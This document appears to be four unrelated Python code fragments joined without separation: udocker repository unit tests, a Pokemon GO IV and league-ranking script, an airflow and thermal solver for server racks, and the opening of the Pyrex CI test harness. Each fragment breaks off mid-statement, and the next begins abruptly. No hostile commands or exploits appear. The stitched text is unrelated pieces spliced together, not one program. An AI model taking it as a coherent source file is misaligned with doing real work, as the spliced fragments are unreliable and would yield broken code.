"d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_cdcont.return_value = contdir mock_getlist.return_value = [contdir] mock_delname.return_value = None mock_getname.return_value = ["mycont"] mock_fu.return_value.remove.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container(cont_id) self.assertTrue(status) self.assertTrue(mock_fu.return_value.remove.called) @patch.object(LocalRepository, 'get_containers_list') @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_16_cd_container(self, mock_fu, mock_exists, mock_getlist): """Test16 LocalRepository().cd_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_getlist.return_value = [contdir] mock_exists.return_value = False lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.cd_container(cont_id) self.assertEqual(status, "") mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_getlist.return_value = [contdir] mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.cd_container(cont_id) self.assertEqual(status, contdir) @patch('udocker.container.localrepo.os.path.relpath') @patch('udocker.container.localrepo.os.symlink') @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_17__symlink(self, mock_fu, mock_exists, mock_symlink, mock_relpath): """Test17 LocalRepository()._symlink().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._symlink("EXISTINGFILE", "LINKFILE") self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = False mock_symlink.return_value = None mock_relpath.return_value = "cont/ROOT" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._symlink("EXISTINGFILE", "LINKFILE") self.assertTrue(status) @patch('udocker.container.localrepo.FileUtil') def test_18__name_is_valid(self, mock_fu): """Test18 LocalRepository()._name_is_valid(). Check name alias validity. """ mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzskjghdlak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertTrue(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzskjghd/lak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = ".lzsklak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "]lzsklak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzs[klak" status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzs klak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "x" * 2049 lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) @patch('udocker.container.localrepo.os.path.exists') @patch.object(LocalRepository, '_symlink') @patch.object(LocalRepository, 'cd_container') @patch('udocker.container.localrepo.FileUtil') def test_18_set_container_name(self, mock_fu, mock_cd, mock_slink, mock_exists): """Test18 LocalRepository().set_container_name().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.set_container_name(container_id, "WRONG[/") self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_cd.return_value = "CONTAINERDIR" mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.set_container_name(container_id, "RIGHT") self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_cd.return_value = "CONTAINERDIR" mock_exists.return_value = False mock_slink.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.set_container_name(container_id, "RIGHT") self.assertTrue(status) @patch.object(LocalRepository, '_name_is_valid') @patch('udocker.container.localrepo.os.path.islink') @patch('udocker.container.localrepo.FileUtil') def test_19_del_container_name(self, mock_fu, mock_islink, mock_nameisvalid): """Test19 LocalRepository().del_container_name().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contname = "mycont" mock_nameisvalid.return_value = False lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container_name(contname) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contname = "mycont" mock_nameisvalid.return_value = True mock_islink.return_value = True mock_fu.return_value.remove.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container_name(contname) self.assertTrue(status) @patch('udocker.container.localrepo.os.readlink') @patch('udocker.container.localrepo.os.path.isdir') @patch('udocker.container.localrepo.os.path.islink') @patch('udocker.container.localrepo.FileUtil') def test_20_get_container_id(self, mock_fu, mock_islink, mock_isdir, mock_readlink): """Test20 LocalRepository().get_container_id().""" mock_fu.return_value.register_prefix.side_effect = \ [None,
for s in self.ivs]) overwrite['ivs'] = new_ivs overwrite['form'] = 'Purified' overwrite['shadow'] = False # TODO: replace frustration with return new = self.copy(**overwrite) return new def family(self, ancestors=True, node=False, onlyadj=False): """ Get other members of this pokemon family Yields: Pokemon: other members of this family Ignore: self = Pokemon('gastly', ivs=[6, 13, 15]) self = Pokemon('haunter', ivs=[6, 13, 15]) self = Pokemon('gengar', ivs=[6, 13, 15]) list(self.family()) self = Pokemon('magikarp', ivs=[6, 13, 15]) list(self.family()) self = Pokemon('eevee', ivs=[6, 13, 15]) list(self.family(onlyadj=True)) self = Pokemon('ralts', ivs=[6, 13, 15], shadow=True) list(self.family(onlyadj=True)) list(self.family()) """ import networkx as nx blocklist = set() if not node: blocklist.add(self.name) if not ancestors: toadd = set(nx.ancestors(api.evo_graph, self.name)) blocklist.update(toadd) cc = api.name_to_family[self.name] if onlyadj: keeplist = set(api.evo_graph.adj[self.name]) blocklist = set(cc) - keeplist kw = { 'level': self.level, 'form': self.form, 'ivs': self.ivs, 'shadow': self.shadow, 'shiny': self.shiny, } for name in cc: if name not in blocklist: if name == self.name: other = Pokemon(name, cp=self.cp, **kw) else: other = Pokemon(name, **kw) yield other if other.shadow: yield other.purify() def populate_cp(self): level = self.level iva, ivd, ivs = self.ivs attack = self.info['base_attack'] + iva defense = self.info['base_defense'] + ivd stamina = self.info['base_stamina'] + ivs cp, adjusted = calc_cp(attack, defense, stamina, level) self.cp = cp self.adjusted = adjusted return cp, adjusted def check_evolution_cps(self, max_cp=1500, max_level=45): """ self = Pokemon('gastly', ivs=[6, 13, 15]) self.check_evolution_cps() self = Pokemon('gyarados', ivs=[6, 13, 15]) self.check_evolution_cps() self = Pokemon('magikarp', ivs=[6, 13, 15]) self.check_evolution_cps() """ import numpy as np evos = list(self.family(ancestors=False)) if len(evos) == 0: print('no evolutions available') for evo in evos: other = evo best_level = None for level in list(np.arange(1, max_level + 0.5, 0.5)): # TODO: could binary search other.level = level other.populate_cp() if other.cp <= max_cp: best_level = level else: break other.level = best_level other.populate_cp() print('To achieve other = {!r}'.format(other)) self.level = best_level cp, adjusted = self.populate_cp() print('self = {!r}'.format(self)) print('Pokemon CP must be less than this to be used in league') print('cp = {!r}'.format(cp)) def leage_rankings_for(self, have_ivs, max_cp=1500, max_level=45): """ Given a set of IVs for this pokemon compute the leage rankings """ leage_df = self.find_leage_rankings(max_cp=max_cp, max_level=max_level) leage_df = leage_df.set_index(['iva', 'ivd', 'ivs']) if abs(min(leage_df['cp'].max() - min(3000, max_cp), 0)) > 200: print('Out of this leage {}'.format(max_cp)) else: rows = [] for haves in have_ivs: # ultra_row = ultra_df.loc[haves] leage_row = leage_df.loc[haves] rows.append({ 'iva': haves[0], 'ivd': haves[1], 'ivs': haves[2], 'rank': leage_row['rank'], 'level': leage_row['level'], 'cp': leage_row['cp'], 'stat_product': leage_row['stat_product'], 'attack': leage_row['attack'], 'defense': leage_row['defense'], 'stamina': leage_row['stamina'], 'percent': leage_row['percent'], }) import pandas as pd rankings = pd.DataFrame.from_dict(rows) # print('') print('Leage {} Rankings'.format(max_cp)) print('self = {!r}'.format(self)) print(rankings.sort_values('rank')) def find_leage_rankings(self, max_cp=1500, max_level=45): """ Calculate the leage rankings for this pokemon's IVs, based on the adjusted stat product heuristic. Ignore: >>> import sys, ubelt >>> sys.path.append(ubelt.expandpath('~/misc/pkmn')) >>> from query_team_builder import * # NOQA >>> self = Pokemon('beedrill') >>> beedrill_df = self.find_leage_rankings(max_cp=1500) >>> # Find the best IVs that we have for PVP >>> self = Pokemon('empoleon') >>> have_ivs = [ >>> (0, 10, 14), >>> (1, 11, 5), >>> (1, 5, 7), >>> (1, 9, 13), >>> (2, 15, 13), >>> (2, 2, 10), >>> (2, 6, 9), >>> (3, 13, 11), >>> (3, 3, 2), >>> (4, 13, 13), >>> (5, 13, 14), >>> (4, 14, 14), >>> (7, 13, 3), >>> (13, 14, 14), >>> (15, 14, 14), >>> ] >>> self = Pokemon('beedrill') >>> have_ivs = [ >>> (0, 8, 14), >>> (0, 12, 14), >>> (1, 3, 10), >>> (1, 13, 6), >>> (4, 11, 13), >>> (4, 14, 13), >>> (1, 13, 7), >>> (1, 10, 8), >>> (4, 13, 13), >>> (4, 14, 14), >>> (4, 15, 12), >>> (5, 14, 11), >>> (11, 15, 14), >>> (15, 15, 15), >>> (12, 15, 15), >>> ] >>> self.leage_rankings_for(have_ivs) >>> have_ivs = [ >>> (4, 13, 10), >>> (5, 11, 14), >>> (4, 13, 11), >>> (6, 13, 15), >>> (7, 12, 13), >>> (7, 14, 14), >>> (7, 15, 15), >>> (7, 2, 9), >>> (10, 15, 11), >>> (15, 15, 15), >>> (7, 15, 15), >>> ] >>> self = Pokemon('gengar') >>> print('self.info = {}'.format(ub.repr2(self.info, nl=2))) >>> self.leage_rankings_for(have_ivs) >>> self = Pokemon('haunter') >>> print('self.info = {}'.format(ub.repr2(self.info, nl=2))) >>> self.leage_rankings_for(have_ivs) >>> have_ivs = [ >>> (12, 11, 14), >>> (12, 15, 15), >>> (15, 15, 15), >>> ] >>> Pokemon('blaziken').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('blaziken').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('blaziken').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (0, 2, 14), >>> (4, 2, 13), >>> (11, 13, 12), >>> (4, 13, 9), >>> (15, 12, 13), >>> (13, 14, 13), >>> (13, 14, 13), >>> (14, 14, 10), >>> (6, 15, 11), # purified >>> (13, 15, 14), # purified >>> ] >>> Pokemon('swampert').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('swampert').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('swampert').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (1, 2, 15), >>> (12, 15, 14), >>> (14, 15, 14), >>> (14, 14, 14), >>> (14, 13, 15), >>> (15, 15, 10), >>> ] >>> Pokemon('sceptile').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('sceptile').leage_rankings_for(have_ivs, max_cp=2500) >>> have_ivs = [ >>> (0, 10, 15), >>> (1, 14, 11), >>> (11, 14, 13), >>> (12, 12, 13), >>> (14, 13, 13), >>> (2, 13, 12), >>> (2, 13, 15), >>> (2, 14, 14), >>> (2, 15, 14), >>> (3, 12, 11), >>> (3, 4, 15), >>> (3, 13, 14), >>> (3, 5, 2), >>> (4, 10, 13), >>> (4, 12, 15), # shadow >>> (5, 15, 12), >>> (7, 13, 15), >>> (7, 15, 8), >>> (15, 13, 15), >>> ] >>> Pokemon('gyarados').leage_rankings_for(have_ivs, max_cp=np.inf) >>> Pokemon('gyarados').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('gyarados').leage_rankings_for(have_ivs, max_cp=1500) >>> have_ivs = [ >>> (14, 14, 15), >>> (10, 14, 15), >>> (15, 15, 15), >>> (15, 15, 15), >>> ] >>> Pokemon('rhyperior').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (14, 14, 14), >>> (12, 13, 14), >>> (13, 14, 14), >>> (15, 13, 14), >>> (8, 6, 8), >>> ] >>> Pokemon('vigoroth').leage_rankings_for(have_ivs, max_cp=1500) >>> have_ivs = [ >>> (6, 15, 13), >>> (3, 4, 14), >>> (2, 9, 15), >>> (6, 14, 15), >>> (7, 15, 15), >>> (10, 15, 15), >>> ] >>> Pokemon('shiftry').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('shiftry').leage_rankings_for(have_ivs, max_cp=2500) >>> have_ivs = [ >>> (15, 15, 14), >>> (0, 7, 8), >>> (3, 12, 14), >>> (5, 5, 15), >>> (4, 7, 12), >>> (15, 14, 14), >>> (10, 14, 15), >>> ] >>> Pokemon('alakazam').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('alakazam').leage_rankings_for(have_ivs, max_cp=2500) >>> have_ivs = [ >>> (0, 15, 6), >>> (11, 10, 10), >>> (12, 12, 11), >>> (15, 10, 12), >>> ] >>> Pokemon('salamence').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('salamence').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('salamence').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (6, 10, 10), >>> (11, 9, 14), >>> (13, 12, 14), >>> (15, 15, 15), >>> (15, 15, 5), >>> ] >>> Pokemon('flygon').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('flygon').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('flygon').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (6, 11, 11), >>> (10, 11, 10), >>> (10, 11, 12), >>> (6, 14, 4), >>> (15, 12, 15), >>> (15, 7, 15), >>> ] >>> Pokemon('mamoswine').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('mamoswine').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('mamoswine').leage_rankings_for(have_ivs, max_cp=np.inf) """ rows = [] import itertools as it import numpy as np for iva, ivd, ivs in it.product(range(16), range(16), range(16)): attack = self.info['base_attack'] + iva defense = self.info['base_defense'] + ivd stamina = self.info['base_stamina'] + ivs best_level = None best_cp = None best_adjusted = None for level in list(np.arange(1, max_level + 0.5, 0.5)): cand_cp, adjusted = calc_cp(attack, defense, stamina, level) if cand_cp <= max_cp: best_cp = cand_cp best_level = level best_adjusted = adjusted else: break row = { 'iva': iva, 'ivd': ivd, 'ivs': ivs, 'cp': best_cp, 'level': best_level, 'attack': best_adjusted['attack'], 'defense': best_adjusted['defense'], 'stamina': best_adjusted['stamina'], } rows.append(row) import kwarray df = kwarray.DataFrameArray.from_dict(rows) df = df.pandas() df['stat_product'] = (df['attack'] * df['defense'] * df['stamina']) / 1000 df = df.sort_values('stat_product', ascending=False) df['rank'] = np.arange(1, len(df) + 1) df = df.set_index('rank', drop=False) min_ = df['stat_product'].min() max_ = df['stat_product'].max() df['percent'] = ((df['stat_product'] - min_) / (max_ - min_)) * 100 return df def calc_cp(self): if self.level is None: best_cp
# -*- coding: utf-8 -*- """ Created on Tue Jun 25 08:19:27 2019 @author: SESA539950 """ from scipy.optimize import fsolve import numpy as np simulation = ["AC Unit", "Ventilation Fans (Economizer Mode)"] simulation_options = ["AC Fans on UPS", "Vent Fans on UPS"] simulation01 = [ "AC Unit", "Front Ventilation Fan (Economizer Mode)", "Rear Ventilation Fan (Economizer Mode)", "Both Ventilation Fans (Economizer Mode)", ] simulation_options01 = [ "AC Fans (on UPS)", "Front Ventilation Fan (on UPS)", "Rear Ventilation Fan (on UPS)", "Front Ventilation Fan (on UPS)", "Rear Ventilation Fan (on UPS)", "Both Ventilation Fans (on UPS)", ] w = 2 # Door width [ft] rho = 1.19 # Density of air [kg/m^3] Cp = 1005.0 # Specific heat capacity of air [J/kg-K] a_AC = 117137.3 # Flow resistance of AC fan [Pa/(m^3/s)^2] e_IT = 0.8 # Effectiveness of heat exchanger in IT servers + UPS # C_AC = 26*650 # Thermal mass of AC [J/K] # e_AC = 0.8 # Effectiveness of heat exchanger in AC Q = np.zeros(10) P = np.zeros(4) dt = 1 class FNMsolver: def __init__( self, ss_condition, AC_option, VF_option, size_rack, n_IT, q_IT, n_BP, T_AC, T_amb, size_UPS, q_UPS, t_max, size_AC, Q_AC_max, Q_VF_max, P_AC_stag, P_VF_stag, a_FL, a_RL, ): self.ss_condition = ss_condition # Steady-state Simulation condition self.tr_condition = ss_condition # Transient Simulation condition self.AC_option = AC_option # AC Fans on UPS self.VF_option = VF_option # Vent Fans on UPS self.size_rack = size_rack # Rack size in U self.h = self.size_rack * 6.5 / 42 # Door height [ft] self.n_IT = n_IT # Total IT population in rack (U) self.C_IT = n_IT * 11.3 * 650 # Thermal mass of IT servers + UPS [J/K] self.q_IT = q_IT * 1000 # Total IT power (kW to W converted) self.Q_IT = 0.125 * self.q_IT * 0.0004719474 # Total IT airflow rate [m^3/s] self.n_BP = n_BP # Number of blanking panels self.T_AC = (T_AC - 32) * 5 / 9 + 273.15 # AC set point temperature [K] self.T_amb = (T_amb - 32) * 5 / 9 + 273.15 # Ambient Temperature [K] self.size_UPS = size_UPS # Size of UPS (U) self.C_UPS = self.size_UPS * 11.3 * 650 # Thermal mass of UPS [J/K] self.C_IT = self.C_IT + self.C_UPS # Thermal mass of IT servers + UPS [J/K] self.q_UPS = ( q_UPS * 1000 * 0.1 ) # Heat generated by UPS (10% of rated power) (kW to W converted) self.t_max = 60 * t_max # Total simulation time (s) self.size_AC = size_AC # Size of cooling unit (U) self.C_AC = self.size_AC * 26 * 650 # Thermal mass of AC self.q_AC = q_IT * 1000 # Cooling capacity of AC (W) self.Q_AC_max = ( Q_AC_max * 0.0004719474 ) # Open flow rate (cfm to m^3/s converted) self.Q_VF_max = Q_VF_max * 0.0004719474 self.P_AC_stag = ( P_AC_stag * 248.84 ) # Stagnation pressure (inH2O to Pa converted) self.P_VF_stag = P_VF_stag * 248.84 self.a_FL = 10 ** a_FL self.a_RL = 10 ** a_RL # Nomenclature of resistances, airflow rates and pressure terms # Q_IT = Q[0] # Q_AC = Q[1] # Q_SP = Q[2] # Q_L = Q[3] # Q_VF_f = Q[4] # Q_VF_r = Q[5] ## Q_FD = Q[6] ## Q_FP = Q[7] ## Q_RD = Q[8] ## Q_RP = Q[9] # # P_1 = P[0] # P_2 = P[1] ## P_1_f = P[2] ## P_2_r = P[3] # # a_AC = {a_AC: .2f} # a_SP = {a_SP: .2f} ## a_FD = {a_FD: .2f} ## a_FP = {a_FP: .2f} # a_FL = {a_FL: .2f} ## a_RD = {a_RD: .2f} ## a_RP = {a_RP: .2f} # a_RL = {a_RL: .2f} def flowRes(self): if ( self.size_rack - self.n_IT - self.n_BP - self.size_UPS - self.size_AC ) == 0.0: a_SP = ( 1530.5 * (6.5 / self.h) ** 2 ) # Server plane resistance measured from St. Louis data elif ( self.size_rack - self.n_IT - self.n_BP - self.size_UPS - self.size_AC ) > 0.0: b_SP = ( self.size_rack - self.n_IT - self.size_UPS - self.size_AC - self.n_BP ) / (self.size_rack - self.n_IT - self.size_UPS - self.size_AC) f_SP = (1 / b_SP ** 2) * ( 1 + (0.5 * (1 - b_SP) ** 0.75) + (1.414 * (1 - b_SP) ** 0.375) ) a_SP = ( f_SP * rho / ( 2 * ( 0.905 * (self.size_rack - self.n_IT - self.size_UPS - self.size_AC) / self.size_rack ) ** 2 ) ) # Rear area of rack (size of 42 U) = 0.905 m^2 # if self.ss_condition == simulation01[1] or self.VF_option == [simulation_options01[1]] or self.VF_option == [simulation_options01[3]]: # a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # a_RL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # # elif self.ss_condition == simulation01[2] or self.VF_option == [simulation_options01[2]] or self.VF_option == [simulation_options01[4]]: # a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # a_RL = 0.01 * self.a_RL * 1530.5 * (6.5 / self.h) ** 2 # # elif self.ss_condition == simulation01[3] or self.VF_option == [simulation_options01[1], simulation_options01[2]] or self.VF_option == [simulation_options01[2], simulation_options01[1]] or self.VF_option == [simulation_options01[5]]: # a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # a_RL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 if self.ss_condition == simulation01[0] and not self.VF_option: a_FL = self.a_FL * 1530.5 * (6.5 / self.h) ** 2 a_RL = self.a_FL * 1530.5 * (6.5 / self.h) ** 2 else: a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 a_RL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 a = [a_SP, a_FL, a_RL] return a # AC Unit ON, Both VF OFF def case_1(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[1] - self.Q_AC_max * (1 - (P[0] - P[1]) / self.P_AC_stag) f[2] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[3] = Q[3] - np.sign(-P[0]) * np.sqrt(np.abs(P[0]) / a[1]) f[4] = Q[3] - np.sign(P[1]) * np.sqrt(np.abs(P[1]) / a[2]) f[5] = Q[3] + Q[1] - Q[0] - Q[2] f[6] = Q[4] f[7] = Q[5] return f # Both VF ON, AC Unit OFF def case_2(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[4] - self.Q_VF_max * (1 - (P[0] / self.P_VF_stag)) f[2] = Q[5] - self.Q_VF_max * (1 - (-P[1]) / self.P_VF_stag) f[3] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[4] = Q[1] - np.sign(P[1] - P[0]) * np.sqrt(np.abs(P[1] - P[0]) / a_AC) f[5] = Q[3] - Q[2] + Q[1] - Q[0] f[6] = Q[3] - Q[4] - np.sign(-P[0]) * np.sqrt(np.abs(P[0]) / a[1]) f[7] = Q[3] - Q[5] - np.sign(P[1]) * np.sqrt(np.abs(P[1]) / a[2]) return f # Front VF ON, AC Unit OFF def case_2a(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[4] - self.Q_VF_max * (1 - (P[0] / self.P_VF_stag)) f[2] = Q[5] f[3] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[4] = Q[1] - np.sign(P[1] - P[0]) * np.sqrt(np.abs(P[1] - P[0]) / a_AC) f[5] = Q[3] - Q[2] + Q[1] - Q[0] f[6] = Q[3] - Q[4] - np.sign(-P[0]) * np.sqrt(np.abs(P[0]) / a[1]) f[7] = Q[3] - np.sign(P[1]) * np.sqrt(np.abs(P[1]) / a[2]) return f # Rear VF ON, AC Unit OFF def case_2b(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[4] f[2] = Q[5] - self.Q_VF_max * (1 - (-P[1]) / self.P_VF_stag) f[3] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[4] = Q[1] - np.sign(P[1] - P[0]) * np.sqrt(np.abs(P[1] - P[0]) / a_AC) f[5] = Q[3] - Q[2] + Q[1] - Q[0] f[6] = Q[3] - np.sign(-P[0]) * np.sqrt(np.abs(P[0])
<filename>ci/test.py #! /usr/bin/env python3 # # Copyright 2019-2020 Garmin Ltd. or its subsidiaries # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import configparser import grp import os import pty import pwd import re import resource import shutil import subprocess import sys import tempfile import threading import unittest PYREX_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) sys.path.append(PYREX_ROOT) import pyrex # NOQA TEST_PREBUILT_TAG_ENV_VAR = "TEST_PREBUILT_TAG" def skipIfPrebuilt(func): def wrapper(self, *args, **kwargs): if os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, ""): self.skipTest("Test does not apply to prebuilt images") return func(self, *args, **kwargs) return wrapper def skipIfOS(os, version): def decorator(func): def wrapper(self, *args, **kwargs): (image_os, image_version, _) = self.test_image.split("-") if image_os == os and image_version == version: self.skipTest("Test does not apply to %s-%s" % (os, version)) return func(self, *args, **kwargs) return wrapper return decorator built_images = set() class PyrexTest(object): @property def pokyroot(self): return os.path.join(PYREX_ROOT, "poky", self.pokyver) def setUp(self): self.build_dir = os.path.join(PYREX_ROOT, "build", "%d" % os.getpid()) def cleanup_build(): if os.path.isdir(self.build_dir): shutil.rmtree(self.build_dir) self.addCleanup(cleanup_build) cleanup_build() os.makedirs(self.build_dir) self.pyrex_conf = os.path.join(self.build_dir, "pyrex.ini") conf = self.get_config() conf.write_conf() if not os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, ""): self.prebuild_image() def cleanup_env(): os.environ.clear() os.environ.update(self.old_environ) # OE requires that "python" be python2, not python3 self.bin_dir = os.path.join(self.build_dir, "bin") self.old_environ = os.environ.copy() os.makedirs(self.bin_dir) os.symlink("/usr/bin/python2", os.path.join(self.bin_dir, "python")) os.environ["PATH"] = self.bin_dir + ":" + os.environ["PATH"] os.environ["PYREX_BUILD_QUIET"] = "0" os.environ["PYREX_OEINIT"] = os.path.join(self.pokyroot, "oe-init-build-env") os.environ["PYREX_CONFIG_BIND"] = PYREX_ROOT for var in ("SSH_AUTH_SOCK", "BB_ENV_PASSTHROUGH_ADDITIONS"): if var in os.environ: del os.environ[var] self.thread_dir = os.path.join( self.build_dir, "%d.%d" % (os.getpid(), threading.get_ident()) ) os.makedirs(self.thread_dir) def prebuild_image(self): global built_images image = ":".join((self.test_image, self.provider)) if image not in built_images: self.assertSubprocess( [ os.path.join(PYREX_ROOT, "ci", "build_image.py"), "--provider", self.provider, self.test_image, ] ) built_images.add(image) def get_config(self, *, defaults=False): class Config(configparser.RawConfigParser): def write_conf(self): write_config_helper(self) def write_config_helper(conf): with open(self.pyrex_conf, "w") as f: conf.write(f) config = Config() if os.path.exists(self.pyrex_conf) and not defaults: config.read(self.pyrex_conf) else: config.read_string(pyrex.read_default_config(True)) # Setup the config suitable for testing config["config"]["image"] = self.test_image config["config"]["engine"] = self.provider config["config"]["buildlocal"] = "0" tag = os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, "") if tag: config["config"]["pyrextag"] = tag else: config["config"]["pyrextag"] = "ci-test" config["config"]["registry"] = "" config["run"]["bind"] += " " + self.build_dir config["imagebuild"]["buildcommand"] = "%s --provider=%s %s" % ( os.path.join(PYREX_ROOT, "ci", "build_image.py"), self.provider, self.test_image, ) return config def assertSubprocess( self, *args, pretty_command=None, capture=False, returncode=0, **kwargs ): if capture: try: output = subprocess.check_output( *args, stderr=subprocess.STDOUT, **kwargs ) except subprocess.CalledProcessError as e: ret = e.returncode output = e.output else: ret = 0 self.assertEqual( ret, returncode, msg="%s: %s" % (pretty_command or " ".join(*args), output.decode("utf-8")), ) return output.decode("utf-8").rstrip() else: with subprocess.Popen( *args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs ) as proc: while True: out = proc.stdout.readline().decode("utf-8") if not out and proc.poll() is not None: break if out: sys.stdout.write(out) ret = proc.poll() self.assertEqual( ret, returncode, msg="%s failed" % (pretty_command or " ".join(*args)) ) return None def _write_host_command( self, args, *, quiet_init=False, cwd=PYREX_ROOT, builddir=None, bitbakedir="", init_env={} ): if builddir is None: builddir = self.build_dir command = ['export %s="%s"\n' % (k, v) for k, v in init_env.items()] command.extend( [ "PYREXCONFFILE=%s\n" % self.pyrex_conf, ". %s/pyrex-init-build-env%s %s %s && " % ( self.pokyroot, " > /dev/null 2>&1" if quiet_init else "", builddir, bitbakedir, ), "(", " && ".join(list(args)), ")", ] ) command = "".join(command) cmd_file = os.path.join(self.thread_dir, "command") with open(cmd_file, "w") as f: f.write(command) return cmd_file, command def _write_container_command(self, args): cmd_file = os.path.join(self.thread_dir, "container_command") with open(cmd_file, "w") as f: f.write(" && ".join(args)) return cmd_file def assertPyrexHostCommand( self, *args, quiet_init=False, cwd=PYREX_ROOT, builddir=None, bitbakedir="", init_env={}, **kwargs ): cmd_file, command = self._write_host_command( args, quiet_init=quiet_init, cwd=cwd, builddir=builddir, bitbakedir=bitbakedir, init_env=init_env, ) return self.assertSubprocess( [os.environ.get("SHELL", "/bin/bash"), cmd_file], pretty_command=command, cwd=cwd, **kwargs ) def assertPyrexContainerShellCommand(self, *args, **kwargs): cmd_file = self._write_container_command(args) return self.assertPyrexHostCommand("pyrex-shell %s" % cmd_file, **kwargs) def 